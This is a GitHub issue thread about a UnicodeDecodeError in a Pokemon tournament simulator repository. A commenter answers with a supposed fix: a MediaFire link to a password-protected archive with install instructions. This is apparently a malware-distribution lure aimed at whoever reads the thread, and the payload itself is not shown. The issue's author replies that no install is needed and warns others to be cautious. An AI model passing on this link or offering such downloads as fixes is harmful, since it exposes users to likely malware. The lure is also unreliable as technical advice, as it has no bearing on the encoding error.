### ISSUE TITLE
UnicodeDecodeError: 'charmap' codec can't decode byte 0x81 in position 7398: character maps to <undefined>

### ISSUE THREAD

**Issue by tastyOats** [cRz-Shadows/Pokemon_Trainer_Tournament_Simulator#9]
unsure as to why this encoding error occurs. 

![image](https://github.com/user-attachments/assets/f84e147c-2e8e-48da-9f33-b25c2866e822)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tastyOats** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue,
> https://app.mediafire.com/dqajf1x14ccfd
> password: changeme
> when you installing it, you need to place a check in install to path and select usx

there is zero chance this situation requires an additional install. for anyone seeing this please exercise caution
